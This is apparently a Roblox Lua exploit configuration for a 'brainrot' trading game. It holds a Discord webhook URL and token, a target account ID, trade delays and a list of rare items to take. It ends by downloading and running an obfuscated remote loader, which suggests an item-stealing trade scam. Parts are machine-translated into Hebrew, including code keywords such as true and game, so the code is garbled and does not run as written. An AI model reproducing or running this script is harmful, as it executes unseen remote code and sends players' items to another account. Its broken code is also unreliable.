getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477105982692917330/1SxfkPoD3Vco5Dn0R93CIIFowuL02wxXImp8_qyQiWtO6MUq_2ZUb9c4qfaefOjZUhdi"
getgenv().TARGET_ID = 7439984531
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["דרקון קנלוני"] = נכון,
    ["דרקון ג'ינג'ריני"] = נכון,
    ["הידרה דרקון קנלוני"] = נכון,
    ["מיאול"] = נכון,
    ["שירותי סקיבידי"] = נכון,
    ["פיל תות"] = נכון,
    ["La Vacca Saturno Saturnita"] = נכון,
    ["פריטו בוריטו"] = נכון,
    ["Quesadillo Vampiro"] = נכון,
    ["Tacorita Bicicleta"] = נכון,
    ["הגדולה הנכחדת"] = נכון,
    ["הגדולה המפחידה"] = נכון,
    ["צ'יפסו וקסו"] = נכון,
    ["צ'ילי צ'ילי"] = נכון,
    ["טוקאן טוף"] = נכון,
    ["גובלינו יוניציקלינו"] = נכון,
    ["W או L"] = נכון,
    ["לה ג'ולי גראנד"] = נכון,
    ["שילוב טאקו"] = נכון,
    ["Swaggy Bros"] = נכון,
    ["La Romantic Grande"] = נכון,
    ["חגיגי 67"] = נכון,
    ["כסף כסף פאגי"] = נכון,
    ["נוקלארו דינוסאורו"] = נכון,
    ["Tang Tang Keletang"] = נכון,
    ["קטופאט קפט"] = נכון,
    ["טיקטק סאחור"] = נכון,
    ["קטצ'ורו ומוסטורו"] = נכון,
    ["Lavadorito Spinito"] = נכון,
    ["גראמה ומדונדונג"] = נכון,
    ["בורגורו ופריורו"] = נכון,
    ["קפטן מובי"] = נכון,
    ["קרברוס"] = נכון,
    ["פרגולה לה לה לה"] = נכון,
    ["מריאצ'י קוראזוני"] = נכון,
    ["ספוקי ודלעת"] = נכון,
    ["פרגרמה וצ'וקראמה"] = נכון,
    ["ג'ינג'ר גראט"] = נכון,
    ["אהבה אהבת דוב"] = נכון,
    ["לוס ספגטי"] = נכון,
    ["לוס טקוריטס"] = נכון,
    ["הפרימוס"] = נכון,
    ["לוס פאגיס"] = נכון,
    ["טרללדון"] = נכון,
    ["לוס ברוס"] = נכון,
    ["לה קאסה בו"] = נכון,
    ["לוס סקולהס"] = נכון,
    ["רייניטו סלייהיטו"] = נכון,
    ["אחים קטופאט"] = נכון,
    ["קוקי ומילקי"] = נכון,
    ["רוזי וטדי"] = נכון,
    ["פופקורו ופיזורו"] = נכון,
    ["השילוב העליון"] = נכון,
    ["פרש חסר ראש"] = נכון,
    ["Celularcini Viciosini"] = נכון,
    ["לוס מוביליס"] = נכון,
    ["לוס סוכריות"] = נכון,
    ["כסף כסף אייל"] = נכון,
    ["אווילדון"] = נכון,
    ["אורקלדון"] = נכון,
    ["ג'ולי ג'ולי סאחור"] = נכון,
    ["הקומבינציות העליזות"] = נכון,
    ["בית הספר ג'ינג'ר"] = נכון,
    ["הקומבינציות המפחידות"] = נכון,
    ["פישינו ליצן"] = נכון,
    ["ארון טונג טונג טונג סאחור"] = נכון,
    ["טונג טונג טונג סאחור"] = נכון,
    ["רוזטי טואלטי"] = נכון,
    ["ספגטי טואלטי"] = נכון,
    ["סמיני פאטיני"] = נכון,
    ["שילוב המזון"] = נכון,
    ["השילוב הסודי"] = נכון,
    ["החברים"] = נכון,
    ["אהבתי את רוז"] = נכון,
    ["נוביני פיצ'ניני"] = נכון
}
loadstring(משחק:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
